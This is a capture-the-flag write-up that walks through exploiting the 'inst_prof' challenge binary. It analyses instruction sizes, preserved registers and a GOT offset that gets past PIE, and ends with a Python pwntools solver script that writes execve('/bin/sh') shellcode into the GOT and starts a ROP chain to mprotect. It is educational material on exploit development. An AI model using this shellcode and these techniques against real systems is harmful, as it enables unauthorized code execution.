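Any client talking to the service has to consume these 8 bytes after every 4-byte instruction it sends, otherwise the replies pile up in the receive buffer.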

After this, the loop executable region with our custom bytes is freed, and the process is endlessly repeated with subsequent calls to do_test .

Pwnsploitation

The next day I met up with my friend Ambrose and we teamed up to go over our understanding of the binary as presented above, as well as to start in on the exploitation process.

After we had a solid understanding of what the binary did, the challenge was (seemingly) simple: we had to figure out how to use 1, 2, 3, and 4 byte assembly instructions to get a shell.

The first thing I did was generate a list of all 1 and 2 byte assembly instructions using the rasm2 binary that comes with radare just to get an idea of what kind of instructions we'd be able to use:

-> % (python3 -c 'print("\n".join([hex(x)[2:].zfill(2) for x in range(256)]))' | while read i; do echo -n "$i = "; rasm2 -ax86 -b64 -d "$i"; done;) | grep -v invalid
50 = push rax
51 = push rcx
52 = push rdx
53 = push rbx
54 = push rsp
55 = push rbp
56 = push rsi
57 = push rdi
58 = pop rax
59 = pop rcx
5a = pop rdx
5b = pop rbx
5c = pop rsp
5d = pop rbp
5e = pop rsi
5f = pop rdi
6c = insb byte [rdi], dx
6d = insd dword [rdi], dx
6e = outsb dx, byte [rsi]
6f = outsd dx, dword [rsi]
90 = nop
91 = xchg eax, ecx
92 = xchg eax, edx
93 = xchg eax, ebx
94 = xchg eax, esp
95 = xchg eax, ebp
96 = xchg eax, esi
97 = xchg eax, edi
98 = cwde
99 = cdq
9b = wait
9c = pushfq
9d = popfq
9e = sahf
9f = lahf
a4 = movsb byte [rdi], byte ptr [rsi]
a5 = movsd dword [rdi], dword ptr [rsi]
a6 = cmpsb byte [rsi], byte ptr [rdi]
a7 = cmpsd dword [rsi], dword ptr [rdi]
aa = stosb byte [rdi], al
ab = stosd dword [rdi], eax
ac = lodsb al, byte [rsi]
ad = lodsd eax, dword [rsi]
ae = scasb al, byte [rdi]
af = scasd eax, dword [rdi]
c3 = ret
c9 = leave
cb = retf
cc = int3
cf = iretd
d6 = salc
d7 = xlatb
ec = in al, dx
ed = in eax, dx
ee = out dx, al
ef = out dx, eax
f1 = int1
f4 = hlt
f5 = cmc
f8 = clc
f9 = stc
fa = cli
fb = sti
fc = cld
fd = std
-> % (python3 -c 'print("\n".join([hex(x)[2:].zfill(4) for x in range(256, 0x10000)]))' | while read i; do echo -n "$i = "; rasm2 -ax86 -b64 -d "$i"; done;) | grep -v invalid
<lots of assembly instructions redacted>

I was intent on compiling an exhaustive list of instructions we'd be allowed to use, but was running into some issues with the 3 byte instructions as there were 16,777,216 (2^24) potential byte sequences to evaluate.

Meanwhile I asked my friend if he could see if any of the registers' states were saved in between the do_test loops.

It was then that I realized that sometimes it's not worth it to try solving a more general problem if you could just cut to the chase with some manual tests.

Revelation Registered

The breakthrough came when he discovered that the r15 and r14 registers were preserved across iterations of the do_test loop. I think he verified using a simple sequence like this:

[0x7f2d4994a000]> pd 8
    ;-- map.unk2._rw_:
    ;-- rbx:
    ;-- rdi:
    ;-- rip:
    0x7f2d4994a000  b900100000  mov ecx, 0x1000  ; rsi
.-> 0x7f2d4994a005  90          nop
|   0x7f2d4994a006  90          nop
|   0x7f2d4994a007  90          nop
|   0x7f2d4994a008  90          nop
|   0x7f2d4994a009  83e901      sub ecx, 1
`=< 0x7f2d4994a00c  75f7        jne 0x7f2d4994a005
    0x7f2d4994a00e  c3          ret
[0x7f2d4994a000]> dr r13; dr r14; dr r15
0x7ffc7df020c0
0x00000000
0x00000000
[0x7f2d4994a000]> dr r15=0xdeadbeef
0x00000000 -> 0xdeadbeef
[0x7f2d4994a000]> dc
[0x7f2d4994a000]> pd 8
    ;-- map.unk2._rw_:
    ;-- rbx:
    ;-- rdi:
    ;-- rip:
    0x7f2d4994a000  b900100000  mov ecx, 0x1000  ; rsi
.-> 0x7f2d4994a005  90          nop
|   0x7f2d4994a006  90          nop
|   0x7f2d4994a007  90          nop
|   0x7f2d4994a008  90          nop
|   0x7f2d4994a009  83e901      sub ecx, 1
`=< 0x7f2d4994a00c  75f7        jne 0x7f2d4994a005
    0x7f2d4994a00e  c3          ret
[0x7f2d4994a000]> dr r13; dr r14; dr r15
0x7ffc7df020c0
0x00000000
0xdeadbeef

dr can also directly set register values (in addition to displaying them) using the dr reg=... notation, as shown by the dr r15=0xdeadbeef command above.
At the dc command above, we had the STDIN of the binary attached to python so we could send it arbitrary bytes when the program used read() (0x90 * 4 in this case).

We can see that when setting the register value prior to continuing execution with dc that the register value ( r15 in this case) is preserved after arriving at the loop section a second time.

I also verified that r13 was preserved using the same method. I then scrapped my instruction-enumeration approach and tried assembling some useful instructions to see how big they were:

-> % rasm2 -ax86.ks -b64 'mov r15, rsp'
4989e7
-> % rasm2 -ax86.ks -b64 'mov [r15], rsp'
498927
-> % rasm2 -ax86.ks -b64 'mov [r15+8], rsp'
49896708
-> % rasm2 -ax86.ks -b64 'pop r15'
415f
-> % rasm2 -ax86.ks -b64 'shl r15, 0x20'
49c1e720
-> % rasm2 -ax86.ks -b64 'sub rsp, 0x1000'
4881ec00100000
-> % rasm2 -ax86.ks -b64 'ret'
c3

We realized here that there were some (what we called) absolute instructions and some relative instructions; some instructions like mov were not affected by being executed 0x1000 times in the loop, while others, like shl r15, 0x20 would not survive being run multiple times in a loop.

This was tied to the instruction length. Instructions of 3 bytes or fewer could have a ret (one byte: c3) appended to escape the loop after a single pass, whereas instructions that were 4 bytes in length left no room for a ret and had to be run all 0x1000 times.

Instructions that were larger than 4 bytes (like the sub rsp, 0x1000 above) could not be run.
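These rules can be captured in a small helper that turns assembled bytes into the 4-byte slot the service expects. This is a sketch of the idea rather than code from our exploit: to_slot and its run_once flag are invented names, and filling the unused bytes after the ret with nop is my own choice (anything after the ret is never executed).

```python
RET = b"\xc3"
NOP = b"\x90"
SLOT = 4  # read_inst consumes exactly 4 bytes per iteration


def to_slot(code: bytes, run_once: bool = True) -> bytes:
    """Fit assembled instruction bytes into one 4-byte slot.

    With run_once=True a ret is appended so the loop body executes a single
    time; that needs at least one spare byte. With run_once=False the bytes
    are padded with nops and execute all 0x1000 times.
    """
    if len(code) > SLOT:
        raise ValueError("instruction does not fit in 4 bytes")
    if run_once:
        if len(code) == SLOT:
            raise ValueError("no room for ret; this would run 0x1000 times")
        code += RET
    return code.ljust(SLOT, NOP)


print(to_slot(bytes.fromhex("4989e7")).hex())                    # mov r15, rsp ; ret
print(to_slot(bytes.fromhex("49896708"), run_once=False).hex())  # mov [r15+8], rsp
```

A 4-byte instruction such as shl r15, 0x20 is accepted only with run_once=False, which makes the "this will repeat 0x1000 times" decision explicit at the call site.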

While I was still learning more about different x86 instructions, my friend put together a simple write data primitive:

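def writeByteStr(byteString):
    # p is the connection to the target, created elsewhere in the script
    ret = '\xc3'               # ret (assumed definition; not shown in the original snippet)
    writeCmd = '\x41\xc6\x07'  # mov byte [r15], {} (the data byte is appended as the immediate)
    incCmd = '\x49\xff\xc7'    # inc r15
    for b in byteString:
        p.send(writeCmd + b)   # 4 bytes: repeats 0x1000 times, harmless since the store is idempotent
        p.send(incCmd + ret)   # 3 bytes + ret: runs once, then leaves the loop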

This function would write data to the address stored in the r15 register, incrementing it to keep the cursor position current after each written byte.
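To see exactly which bytes go over the wire, here is an offline Python 3 variant of the same idea that only builds the 4-byte chunks and performs no I/O. It is a sketch for illustration: write_payloads is a hypothetical name, and sending the chunks (and consuming the 8 timing bytes the service returns per chunk) is left to whatever connection object the script uses.

```python
MOV_BYTE_R15 = bytes.fromhex("41c607")   # mov byte [r15], imm8 (imm8 follows)
INC_R15_RET = bytes.fromhex("49ffc7c3")  # inc r15 ; ret


def write_payloads(data: bytes) -> list:
    """Return the sequence of 4-byte inputs that writes data at [r15]."""
    chunks = []
    for value in data:
        # Store one byte. This repeats 0x1000 times, which is harmless
        # because writing the same byte to the same address is idempotent.
        chunks.append(MOV_BYTE_R15 + bytes([value]))
        # Advance the cursor exactly once; the ret exits the loop early.
        chunks.append(INC_R15_RET)
    return chunks


for chunk in write_payloads(b"/bin"):
    print(chunk.hex())
```

Writing N bytes therefore costs 2 * N round trips, which matters with the 30 second alarm running on the remote side.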

At this point we were able to write data as long as the address in r15 was in a writable segment, however we needed a game plan of what to write where (as well as how to get what address into r15).

Plan A

The first plan I pitched was that of performing a ret2libc-type exploit where we simply called libc's system function with /bin/bash as the target. In the past I'd done this by leaking a libc function address from the Global Offset Table, deducing which libc was being employed remotely, calculating the offset of system, and making a small ROP chain to jump to this function.

When we started down this road, it became apparent that there were some formidable obstacles in our way, mainly the PIE and the requirement of leaking data. It was while we were brainstorming how to get around these that the realization that mprotect was being called set in. And so Plan B took form.

Plan B

Once we realized that mprotect was called by the make_page_executable function, we realized we could simply write some shellcode somewhere, make it executable, and then jump to it.

In theory.

We ruled out the page allocated by alloc_page since it was marked non-writable while it was being executed. We took a stab at trying to mark some of the stack as executable, however we were unsuccessful (attributing the lack of success to some "unknown" feature of NX, whereas I'd learn later that we were specifying an unaligned address to mprotect). It was at this point that we called it a night and I went to bed dreaming of armored assembly.
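The alignment requirement is easy to express in code: mprotect fails with EINVAL unless addr is a multiple of the page size, so the target address has to be rounded down first. A minimal sketch, assuming 4 KiB pages; the sample value is an rsp reading from one of my debugging sessions and is only there for illustration.

```python
PAGE_SIZE = 0x1000  # 4 KiB pages, assumed


def page_align_down(addr: int) -> int:
    """Round addr down to the start of the page that contains it."""
    return addr & ~(PAGE_SIZE - 1)


def is_page_aligned(addr: int) -> bool:
    return addr % PAGE_SIZE == 0


stack_addr = 0x7ffd632550d8  # an rsp value from a debugging session
print(is_page_aligned(stack_addr))
print(hex(page_align_down(stack_addr)))
```

Since make_page_executable always passes a length of 0x1000, the rounded-down address also determines exactly which single page ends up executable.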

The Next Day

After sleeping on it, I solidified the plan as follows:

1) Find writable region of memory
   a) Region must be a constant offset to some known, reference-able address
2) Write shellcode to that region of memory
3) Set up call to `mprotect` through the `make_page_executable` call
   a) Need to find `pop rdi` gadget to get shellcode address above into `rdi`
4) Get `rip` to the shellcode

Reflecting upon the previous day's work, I realized that I needed a region of memory that was always writable, and which would always be at a constant offset from the .text section.

I originally performed all of the following work on a writable section located just above (visually; at a lower memory address) the page allocated by alloc_page, and got it working reliably on my local machine. However, after trying it remotely (against Google's challenge server), it became apparent that the section was not mapped at the same offset as on my local machine. Guessing at random addresses crossed my mind, but I dislike guessing when another solution can be found. It was then that I decided to refactor my solution to use the GOT as my target. The rest of this post explains the process I went through originally, but with the GOT section substituted as my target in place of the failed one.

The Global Offset Table remained writable (due to only partial RELRO) and was part of the contiguous section of memory mapped with the .text section. Fortunately, there was a reference to the .text section located at the top of the stack each time we entered the loop-executable section:

[0x562e80db3b16]> pd 2
        ;-- rip:
        0x562e80db3b16 b    ffd3           call rbx
        0x562e80db3b18      0f31           rdtsc
[0x562e80db3b16]> ds; pd 8
        ;-- map.unk2._rw_:
        ;-- rbx:
        ;-- rdi:
        0x7fa9a763e000      b900100000     mov ecx, 0x1000    ; rsi
    .-> 0x7fa9a763e005      90             nop
    |   0x7fa9a763e006      90             nop
    |   0x7fa9a763e007      90             nop
    |   0x7fa9a763e008      90             nop
    |   0x7fa9a763e009      83e901         sub ecx, 1
    `=< 0x7fa9a763e00c      75f7           jne 0x7fa9a763e005
        0x7fa9a763e00e      c3             ret
[0x7fa9a763e000]> pxq 8 @ rsp
0x7ffd632550d8  0x0000562e80db3b18   .;...V..

Notice in the highlighted lines that the address of the instruction after call rbx is at the top of the stack in our loop-executable section.

This is in fact the return address within do_test pushed by the call rbx instruction. To check that this return address was a constant offset from the Global Offset Table, I simply subtracted the return address from the GOT address, and re-ran the executable:

[0x7fa9a763e000]> iS ~got
idx=22 vaddr=0x562e80fb4fd8 paddr=0x00001fd8 sz=40 vsz=40 perm=--rw- name=.got
idx=23 vaddr=0x562e80fb5000 paddr=0x00002000 sz=112 vsz=112 perm=--rw- name=.got.plt
[0x7fa9a763e000]> pxq 8 @ rsp
0x7ffd632550d8  0x0000562e80db3b18   .;...V..
[0x7fa9a763e000]> ? section..got.plt - [rsp]
2102504 0x2014e8 010012350 2M 20000:04e8 2102504 "\xe8\x14 " 001000000001010011101000 2102504.0 2102504.000000f 2102504.000000

The iS command is the "information on Sections" command, which displays addresses of the different sections mapped by the process. The ? command is used to perform math operations and returns the answer in a wide variety of formats. The ~ character appended to any command will filter the output much like grep does.

I saw that the GOT address was exactly 0x2014e8 past the return address. Closing and re-opening the program did not change this; however PIE did ensure that the text section's base address was randomized on each execution (save for the last 12 bits). As long as I only used offsets relative to the text section address (provided as a return address from our looped section) then PIE (and ASLR) wouldn't do much to mitigate my efforts.
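To make the PIE reasoning concrete, here is a minimal Python 3 sketch (the names RET_TO_GOT and got_from_return are my own, purely illustrative). It applies the constant offset to the return address seen in the r2 session above and compares the result with the .got.plt address r2 reported. It also compares the low 12 bits of that return address with the one captured in another run in this writeup.

```python
# Offset from the return address inside do_test to .got.plt,
# as measured with `? section..got.plt - [rsp]`.
RET_TO_GOT = 0x2014e8


def got_from_return(ret_addr):
    """Derive the randomized GOT address from the return address at [rsp]."""
    return ret_addr + RET_TO_GOT


# Values copied from the r2 sessions in this writeup.
ret_run1 = 0x562e80db3b18   # return address in the first session
got_run1 = 0x562e80fb5000   # vaddr of .got.plt in the same session
ret_run2 = 0x55ec37271b18   # return address captured in a different run

print(hex(got_from_return(ret_run1)))
print(hex(ret_run1 & 0xfff), hex(ret_run2 & 0xfff))
```

The base address differs between runs, but the page offset of the return address and its distance to the GOT do not, which is all the exploit relies on.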

Since the dm memory-map output from earlier showed that the GOT section was 8k in size, I knew I'd have plenty of space for both my shellcode and ROP chain.

And So ROP Begins...

The next challenge was how I'd get the address into the r15 register. I knew I could simply load the address from rsp using mov r15, [rsp] , which was a 4 byte instruction. But then I'd need to add to it the offset 0x2014e8 to get our GOT address.

My first thought was to simply use the inc r15 instruction several (hundred) times, but even utilizing the 0x1000 loop iterations, it would take roughly 513 calls to the loop (0x2014e8 / 0x1000) to increment it enough times. Instead, I used the loop counter itself (rsi == 0x1000) as a starting value and doubled it 9 times to get the value into another placeholder register. This is where the exploit script started to take form, and here were the first few lines:

#!/usr/bin/env python2
from pwn import *

#open the process
p = process("./inst_prof")

#print program prompt
print(p.readline())

#now we get the return address (text section reference) into r13:
p.send("\x4c\x8b\x2c\x24") #mov r13, [rsp]

#now we need the 0x1000 value into r14:
p.send("\x49\x01\xf6\xc3") #add r14, rsi

#and double it 9 times:
for x in range(9):
    p.send("\x4d\x01\xf6\xc3") #add r14, r14

Note that for both add instructions the last byte is 0xc3, which is the ret instruction; this short-circuits the loop, letting the addition take place exactly 1 time. To generate the assembled bytes for these instructions I used the rasm2 binary (which comes with radare2) with the keystone assembler: rasm2 -ax86.ks -b64 "add r14, r14". To install the keystone assembler, use r2pm init; r2pm update; r2pm -i keystone-lib; r2pm -i keystone from a terminal prompt.
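The "3 bytes plus ret" trick can be captured in a tiny helper. The following is only a sketch in Python 3 (so it uses bytes rather than the Python 2 strings of the solver script), and the function names once and looped are hypothetical, not part of the original exploit. It assumes, as described above, that the service consumes exactly 4 bytes per iteration.

```python
RET = b"\xc3"  # x86-64 `ret`
NOP = b"\x90"  # x86-64 `nop`


def once(code):
    """Build a 4-byte payload whose instruction runs a single time.

    The trailing `ret` leaves the generated loop body early, so the
    instruction is not repeated 0x1000 times.
    """
    if not 1 <= len(code) <= 3:
        raise ValueError("need 1 to 3 bytes of machine code")
    return code + NOP * (3 - len(code)) + RET


def looped(code):
    """Build a 4-byte payload that is executed on every loop iteration."""
    if not 1 <= len(code) <= 4:
        raise ValueError("need 1 to 4 bytes of machine code")
    return code + NOP * (4 - len(code))


add_r14_r14 = once(b"\x4d\x01\xf6")          # add r14, r14 ; ret
mov_r13_rsp = looped(b"\x4c\x8b\x2c\x24")    # mov r13, [rsp]
print(add_r14_r14.hex(), mov_r13_rsp.hex())
```

Idempotent instructions such as mov r13, [rsp] can safely use all 4 bytes, since repeating them 0x1000 times does not change the result.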

It was here I decided to test the script. To do so I added the import from IPython import embed , and added embed() to the script. This allowed me to pause execution (at any place within the script) and attach the r2 debugger to the running process to inspect its state. I simply ran the script with ./solver.py , and after it dropped to the IPython shell, I switched to another terminal and attached to the process with r2 :

-> % r2 -d 14198
[0x7f30b1ae4360]> dr r13; dr r14; dr r15
0x55ec37271b18
0x00200000
0x00000000

And lo and behold, I had my text section reference as well as the start of my offset calculation in r13 and r14 respectively.

To get the rest of the offset into the r14 register, I added a few more lines to the script to add 0x1000, then 0x246 twice, and finally increment 0x5c more times to reach the desired value:

#add another 0x1000 to r14:
p.send("\x49\x01\xf6\xc3") #add r14, rsi

#0x246 + 0x246 = 0x48c
for x in range(2):
    p.send("\x4d\x01\xde\xc3") #add r14, r11

#0x201000 + 0x48c = 0x20148c
#0x2014e8 - 0x20148c = 0x5c
for x in range(0x5c):
    p.send("\x49\xff\xc6\xc3") #inc r14

I'd noticed that every time we entered the loop section the r11 register was set to 0x246, which I added to the offset in the add r14, r11 line above.
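The arithmetic behind this sequence is easy to double-check offline. Below is a small Python 3 sketch that replays the same additions on an ordinary integer instead of a register. The function name build_offset is hypothetical, and the sketch assumes r14 starts at zero, as it did in my sessions.

```python
RSI = 0x1000      # loop counter value the service leaves in rsi
R11 = 0x246       # value observed in r11 on every entry to the loop section
TARGET = 0x2014e8  # distance from the return address to the GOT


def build_offset():
    """Replay the add/inc sequence; return (final r14, number of sends)."""
    r14, sends = 0, 0
    steps = [("rsi", 1), ("double", 9), ("rsi", 1), ("r11", 2), ("inc", 0x5c)]
    for kind, count in steps:
        for _ in range(count):
            if kind == "rsi":
                r14 += RSI      # add r14, rsi
            elif kind == "double":
                r14 += r14      # add r14, r14
            elif kind == "r11":
                r14 += R11      # add r14, r11
            else:
                r14 += 1        # inc r14
            sends += 1
    return r14, sends


r14, sends = build_offset()
print(hex(r14), sends)
```

The whole offset is reached in 105 four-byte sends, compared with more than five hundred looped inc payloads for the naive approach.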

At this point I should have both the text section address in r13 , as well as the offset needed to reference the GOT in r14 . To test, I added the following line to my script to add r14 to r13 :

p.send("\x4d\x01\xf5\xc3") #add r13, r14

Then ran ./solver.py and attached with r2:

[0x7fb876853360]> dr r13; dr r14; dr r15
0x558b57e11000
0x002014e8
0x00000000
[0x7fb876853360]> ? section..got.plt
94056963182592 0x558b57e11000 02530552770210000 87597.4G b57e1000:0000 94056963182592 "\x10\xe1W\x8bU" 010101011000101101010111111000010001000000000000 94056963182592.0 94056965210112.000000f 94056963182592.000000

Success! I had successfully calculated the offset from the loop section's return address to the start of the GOT, and loaded it into one of our scratch registers.

Instead of writing shellcode all over the current GOT contents, I looked at the GOT section for an "empty" area:

[0x7fb876853360]> pxq @ section..got.plt
0x558b57e11000  0x0000000000201e08  0x00007fb876d3d0f0  .. ........v....
0x558b57e11010  0x00007fb876b2e5f0  0x00007fb8768533b0  ...v.....3.v....
0x558b57e11020  0x00007fb87685ca50  0x0000558b57c0f7d6  P..v.......W.U..
0x558b57e11030  0x00007fb876853350  0x00007fb876795420  P3.v.... Tyv....
0x558b57e11040  0x0000558b57c0f806  0x00007fb87685cb20  ...W.U.. ..v....
0x558b57e11050  0x00007fb87685cb50  0x0000558b57c0f836  P..v....6..W.U..
0x558b57e11060  0x0000558b57c0f846  0x0000558b57c0f856  F..W.U..V..W.U..
0x558b57e11070  0x0000000000000000  0x0000558b57e11078  ........x..W.U..
0x558b57e11080  0x0000000000000000  0x0000000000000000  ................
0x558b57e11090  0x0000000000000000  0x0000000000000000  ................
0x558b57e110a0  0x0000000000000000  0x0000000000000000  ................
0x558b57e110b0  0x0000000000000000  0x0000000000000000  ................
0x558b57e110c0  0x0000000000000000  0x0000000000000000  ................
0x558b57e110d0  0x0000000000000000  0x0000000000000000  ................
0x558b57e110e0  0x0000000000000000  0x0000000000000000  ................
0x558b57e110f0  0x0000000000000000  0x0000000000000000  ................

I selected the address on the highlighted line, which was 0xa0 past the GOT start. Since I'd learned that mprotect would only work on addresses that were multiples of 0x1000 , I kept the GOT address in r13 for use in the ROP chain that I was planning to construct.
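The alignment requirement is worth spelling out, since it is what defeated our earlier attempt on the stack: on Linux, mprotect rejects a start address that is not a multiple of the page size. A minimal Python 3 sketch of the check follows; the helper names are illustrative and the addresses are the ones from the dump above.

```python
PAGE_SIZE = 0x1000  # page size assumed throughout this writeup


def is_page_aligned(addr):
    """True if addr is a valid start address for mprotect."""
    return addr % PAGE_SIZE == 0


def page_align_down(addr):
    """Round addr down to the start of the page that contains it."""
    return addr & ~(PAGE_SIZE - 1)


got = 0x558b57e11000          # start of .got.plt in the session above
second_stack = got + 0xa0     # the empty area selected for shellcode and ROP

print(is_page_aligned(got), is_page_aligned(second_stack))
print(hex(page_align_down(second_stack)))
```

In this binary the GOT happens to start exactly on a page boundary, so the GOT address itself can be handed to mprotect while the payload lives 0xa0 bytes into the same page.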

Second Stack

Now that I had a reference to a writable region of memory, I set r15 to point 0xa0 past the GOT, where I'd place all my data for the exploit, including the shellcode and the ROP chain.

First I set r14 to 0xa0:

p.send("\x4d\x31\xf6" + ret) #xor r14, r14
for x in range(0xa0):
    p.send("\x49\xff\xc6" + ret) #inc r14

It was here that I decided I wanted an easy way to distinguish the 3 and 4 byte instructions, so I refactored all the instructions ending in a ret byte to instead append a ret variable, where ret == "\xc3".

Then set r15 to r13 + r14 :

#now copy to r15:
p.send("\x4d\x89\xef" + ret) #mov r15, r13
#now add r15, r14:
p.send("\x4d\x01\xf7" + ret) #add r15, r14

Since my plan was to use r15 as the cursor into the second stack, I set r14 to this address:

p.send("\x4d\x89\xfe" + ret) #mov r14, r15

I was now ready to send my shellcode and inspect my second stack and registers, so that's what I did, adding the writeByteStr() function and directive to my solver script. This is what it looked like at that point:

#!/usr/bin/env python2
from pwn import *

ret = "\xc3"

def writeByteStr(byteString):
    writeCmd = '\x41\xc6\x07' #mov byte [r15], {}
    incCmd = '\x49\xff\xc7' #inc r15
    for b in byteString:
        p.send(writeCmd + b)
        p.send(incCmd + ret)

#open the process
p = process("./inst_prof")

#print program prompt
print(p.readline())

#now we get the return address (text section reference) into r13:
p.send("\x4c\x8b\x2c\x24") #mov r13, [rsp]

#now we need the 0x1000 value into r14:
p.send("\x49\x01\xf6" + ret) #add r14, rsi

#and double it 9 times:
for x in range(9):
    p.send("\x4d\x01\xf6" + ret) #add r14, r14

#add another 0x1000 to r14:
p.send("\x49\x01\xf6" + ret) #add r14, rsi

#0x246 + 0x246 = 0x48c
for x in range(2):
    p.send("\x4d\x01\xde" + ret) #add r14, r11

#0x201000 + 0x48c = 0x20148c
#0x2014e8 - 0x20148c = 0x5c
for x in range(0x5c):
    p.send("\x49\xff\xc6" + ret) #inc r14

p.send("\x4d\x01\xf5" + ret) #add r13, r14

p.send("\x4d\x31\xf6" + ret) #xor r14, r14
for x in range(0xa0):
    p.send("\x49\xff\xc6" + ret) #inc r14

#now copy to r15:
p.send("\x4d\x89\xef" + ret) #mov r15, r13
#now add r15, r14:
p.send("\x4d\x01\xf7" + ret) #add r15, r14

#save second stack pointer
p.send("\x4d\x89\xfe" + ret) #mov r14, r15

#write shellcode to second stack
writeByteStr('\x48\x31\xc0\x48\x89\xec\x50\x48\x89\xe2\x48\xbb\xff\x2f\x62\x69\x6e\x2f\x73\x68' + \
             '\x48\xc1\xeb\x08\x53\x48\x89\xe7\x50\x52\x48\x89\xe2\x50\x57\x48\x89\xe6\xb0\x3b\x0f\x05')

And I launched it so I could inspect with r2 to see if everything was in working order:

-> % r2 -d 5703
[0x7f5463e3c360]> dr r13; dr r14; dr r15
0x558ef8c55000
0x558ef8c550a0
0x558ef8c550ca
[0x7f5463e3c360]> pxq 0x30 @ r14
0x558ef8c550a0  0x4850ec8948c03148  0x69622fffbb48e289  H1.H..PH..H../bi
0x558ef8c550b0  0x08ebc14868732f6e  0x89485250e7894853  n/shH...SH..PRH.
0x558ef8c550c0  0x3bb0e689485750e2  0x000000000000050f  .PWH...;........

Excellent. We can see that r13 holds our GOT reference, while r14 points to the top of our second stack, and r15 points just past the last byte written ( 05 from my shellcode).
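If the pxq output looks scrambled compared with the shellcode string in the script, that is only because pxq prints little-endian quadwords. The following Python 3 sketch (the helper name qwords_le is my own) groups the same shellcode bytes into 8-byte little-endian values so they can be compared against the dump above.

```python
import struct

# The shellcode bytes passed to writeByteStr, written as hex.
SHELLCODE = bytes.fromhex(
    "4831c04889ec504889e248bbff2f62696e2f7368"
    "48c1eb08534889e750524889e250574889e6b03b0f05"
)


def qwords_le(data):
    """Split data into little-endian 64-bit values, zero-padding the tail."""
    padded = data + b"\x00" * (-len(data) % 8)
    return [value for (value,) in struct.iter_unpack("<Q", padded)]


for value in qwords_le(SHELLCODE):
    print("0x%016x" % value)
print(hex(len(SHELLCODE)))
```

The length also explains the register values: r15 ended up 0x2a bytes past r14, which is exactly the size of the shellcode.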

By this point I'd solved problems 1 and 2:

1) Find writable region of memory
    a) Region must be a constant offset to some known, reference-able address
2) Write shellcode to that region of memory

And now had steps 3 and 4 left:

3) Set up call to `mprotect` through the `make_page_executable` call
    a) Need to find `pop rdi` gadget to get shellcode address above into `rdi`
4) Get `rip` to the shellcode

To Call or Not to Call

Having looked at the call to make_page_executable from before, we saw that the first argument to mprotect is passed as an argument to make_page_executable in the rdi register. Therefore I needed to find a pop rdi gadget that I'd call prior to calling make_page_executable in the ROP chain.

Fortunately, r2 has a handy ROP search tool:

[0x7f5464323000]> s main
[0x558ef8a53860]> dr r13; dr r14; dr r15
0x558ef8c55000
0x558ef8c550a0
0x558ef8c550ca
[0x558ef8a53860]> /R/ pop rdi
  0x558ef8a53bc3    5f    pop rdi
  0x558ef8a53bc4    c3    ret
[0x558ef8a53860]> pxq 8 @ rsp
0x7ffcaacd0eb8  0x0000558ef8a53b18   .;...U..
[0x558ef8a53860]> ? 0x558ef8a53bc3 - [rsp]
171 0xab 0253 171 0000:00ab 171 "\xab" 10101011 171.0 171.000000f 171.000000

/R/ allows searching for ROP gadgets using a regular expression

In the /R/ pop rdi line above, I use the gadget search tool to find a pop rdi gadget, and then calculate its offset from the return address in [rsp], showing that the gadget is 0xab past the return address.

At this point I needed an additional qword of scratch space to work with, so I moved my shellcode up by 8 bytes, leaving r14 pointing to a spare qword on my second stack, to which I wrote the GOT address. With this code change, the state of my registers and second stack went from:

r13   == GOT address
r14   == 2nd stack base
r15   == 2nd stack cursor
[rsp] == text section reference
[r14] == shellcode

To:

r13     == scratch
r14     == 2nd stack base
r15     == 2nd stack cursor
[rsp]   == text section reference
[r14]   == GOT address
[r14+8] == shellcode

Or to illustrate with radare, it went from:

[0x558ef8a53860]> dr r13; dr r14; dr r15
0x558ef8c55000
0x558ef8c550a0
0x558ef8c550ca
[0x558ef8a53860]> pxq 0x40 @ r14
0x558ef8c550a0  0x4850ec8948c03148  0x69622fffbb48e289  H1.H..PH..H../bi
0x558ef8c550b0  0x08ebc14868732f6e  0x89485250e7894853  n/shH...SH..PRH.
0x558ef8c550c0  0x3bb0e689485750e2  0x000000000000050f  .PWH...;........
0x558ef8c550d0  0x0000000000000000  0x0000000000000000  ................

To:

[0x55eefe549b16]> dr r13; dr r14; dr r15
0x55eefe74b000
0x55eefe74b0a0
0x55eefe74b0d2
[0x55eefe549b16]> pxq 0x40 @ r14
0x55eefe74b0a0  0x000055eefe74b000  0x4850ec8948c03148  ..t..U..H1.H..PH
0x55eefe74b0b0  0x69622fffbb48e289  0x08ebc14868732f6e  ..H../bin/shH...
0x55eefe74b0c0  0x89485250e7894853  0x3bb0e689485750e2  SH..PRH..PWH...;
0x55eefe74b0d0  0x000000000000050f  0x0000000000000000  ................

Now that the GOT address was saved at [r14] , this freed up r13 to do some more offset calculation needed for the pop rdi gadget I found.

I simply needed [rsp] + 0xab to start my rop chain, which I accomplished via:

p.send("\x4c\x8b\x2c\x24") #mov r13, [rsp]
for x in range(0xab):
    p.send("\x49\xff\xc5" + ret) #inc r13

#save pop addr on rop stack:
p.send("\x4d\x89\x2f" + ret) #mov [r15], r13

r15 now points to the start of our ROP chain, whose first entry is the pop rdi gadget's address. Since ROP depends fully on the state of the rsp register (and the memory region it points to), we have to make sure that the pop rdi gadget will pop the correct value into rdi. That value is the argument we want to supply to make_page_executable, namely the page-aligned address of the GOT we want to mark as executable.

So I load this from our previously saved location at r14 into r13 , and write that to our second stack plus 8:

p.send("\x4d\x8b\x2e" + ret) #mov r13, [r14]
p.send("\x4d\x89\x6f\x08") #mov [r15+8], r13

At this point, our second stack looks like this (logically):

+------------------------+ ;r14
|      GOT address       |
+------------------------+
|                        |
|       Shellcode        |
|                        |
+------------------------+ ;r15
|     pop rdi gadget     |
+------------------------+
|      GOT address       |
+------------------------+

And with radare2 :

[0x55ba1eb91b16]> dr r13; dr r14; dr r15
0x55ba1ed93000
0x55ba1ed930a0
0x55ba1ed930d2
[0x55ba1eb91b16]> pxq 0x40 @ r14
0x55ba1ed930a0  0x000055ba1ed93000  0x4850ec8948c03148  .0...U..H1.H..PH
0x55ba1ed930b0  0x69622fffbb48e289  0x08ebc14868732f6e  ..H../bin/shH...
0x55ba1ed930c0  0x89485250e7894853  0x3bb0e689485750e2  SH..PRH..PWH...;
0x55ba1ed930d0  0x55ba1eb91bc3050f  0x55ba1ed930000000  .......U...0...U
[0x55ba1eb91b16]> pxq 0x20 @ r15
0x55ba1ed930d2  0x000055ba1eb91bc3  0x000055ba1ed93000  .....U...0...U..
0x55ba1ed930e2  0x0000000000000000  0x0000000000000000  ................
[0x55ba1eb91b16]> pd 2 @ [r15]
        0x55ba1eb91bc3      5f             pop rdi
        0x55ba1eb91bc4      c3             ret

Note that the value in r15 is not 8-byte aligned, so it's hard to see where the ROP chain starts when looking at the first pxq output at r14. That is why I repeat the pxq at the r15 register, where the pop rdi gadget and GOT address are more easily recognized.
